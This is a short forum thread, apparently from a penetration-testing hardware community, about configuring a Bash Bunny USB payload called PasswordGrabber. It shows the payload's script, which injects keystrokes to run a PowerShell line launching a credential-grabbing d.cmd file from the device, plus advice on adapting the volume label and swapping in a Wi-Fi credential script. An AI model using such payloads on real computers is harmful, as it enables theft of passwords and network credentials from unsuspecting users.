Opticon Posted May 9, 2017 Share Posted May 9, 2017 @Dave-ee Jones @illwill Thank you for everything you provided. The code for PasswordGrabber is as follows: LED ATTACK ATTACKMODE HID STORAGE DUCKY_LANG se RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" LED FINISH Can I simply replace the d.cmd file with the one used in WifiCreds? Or do I need to retool the powershell code also? Thanks again! Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted May 10, 2017 Share Posted May 10, 2017 5 hours ago, Opticon said: @Dave-ee Jones @illwill Thank you for everything you provided. The code for PasswordGrabber is as follows: LED ATTACK ATTACKMODE HID STORAGE DUCKY_LANG se RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" LED FINISH Can I simply replace the d.cmd file with the one used in WifiCreds? Or do I need to retool the powershell code also? Thanks again! Should work fine, so long as the cmd file is right next to your payload.txt (and it's named 'd.cmd'). Also, this command only works if your BashBunny's name is BashBunny. For e.g. my BashBunny is named DJBUNNY, so if I wanted to launch the d.cmd, I would have to change it like so: RUN WIN powershell ".((gwmi win32_volume -f 'label=''DJBUNNY''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" In Windows, you can change the name by right clicking the drive and click "Rename". Quote Link to comment Share on other sites More sharing options...
jafahulo Posted May 12, 2017 Share Posted May 12, 2017 I think I'm missing something here, but how does this improve upon the current DumpWiFi Creds payload? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.